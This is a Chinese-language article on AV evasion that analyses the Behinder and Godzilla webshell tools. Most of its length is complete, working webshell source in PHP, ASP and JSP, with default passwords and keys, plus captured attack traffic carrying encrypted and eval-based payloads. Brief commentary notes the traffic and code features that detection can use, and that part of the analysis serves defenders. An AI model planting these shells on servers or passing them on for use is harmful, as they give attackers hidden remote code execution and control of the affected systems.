<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params);?>


免杀基础-常见Webshell特征分析


asp中会在for循环进行一段异或处理

<%Response.CharSet = "UTF-8" k="e45e329feb5d925b" '该密钥为连接密码32位md5值的前16位,默认连接密码rebeyondSession("k")=ksize=Request.TotalBytescontent=Request.BinaryRead(size)For i=1 To sizeresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))Nextexecute(result)%>


免杀基础-常见Webshell特征分析


jsp利用的是java的反射,所以会存在ClassLoader,getClass().getClassLoader()等字符特征。

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>


免杀基础-常见Webshell特征分析

冰蝎webshell动态特征

POST /shell.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-type: application/x-www-form-urlencodedReferer: http://localhost/shell.phpUser-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0Cache-Control: no-cachePragma: no-cacheHost: localhostConnection: closeContent-Length: 11224Cookie: PHPSESSID=qmtqbaljijj6mrj7a71q9l6f81;PHPSESSID=qmtqbaljijj6mrj7a71q9l6f81
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

这里主要分析冰蝎3.0,去除了动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5(“admin”)[0:16],但还是会存在一些特征

在使用命令执行时,请求包中content-length为固定的(据java版本改变)

每个请求头中存在

Cache-Control: no-cache,Pragma: no-cache,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8


免杀基础-常见Webshell特征分析

哥斯拉

哥斯拉是一款继菜刀、蚁剑、冰蝎后一款具有众多有点儿的webshell管理工具,使用者可以根据自己的需求选择各种不同的加密方式,动态生成webshell

哥斯拉webshell静态特征

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>

在默认情况下生成的脚本,jsp会出现xc,pass字符和Java反射(ClassLoader, getClass().getClassLoader()),base64加解码等特征。


免杀基础-常见Webshell特征分析


php和asp为最普通的一句话木马这里不进行赘述了。

哥斯拉webshell动态特征

POST /go.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Host: localhostConnection: closeContent-type: application/x-www-form-urlencodedContent-Length: 31979
pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4%2FOBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBifH18b0VABkUWWQ1xBWRKGE4%2FOBRBE0MWRRBCHD5qJmIIR1xHBEEKVwlZGF1JETAAeFtFbThBS1QEQwcOVX0GUlpWVxxFbDBzNmMrdy9iR0J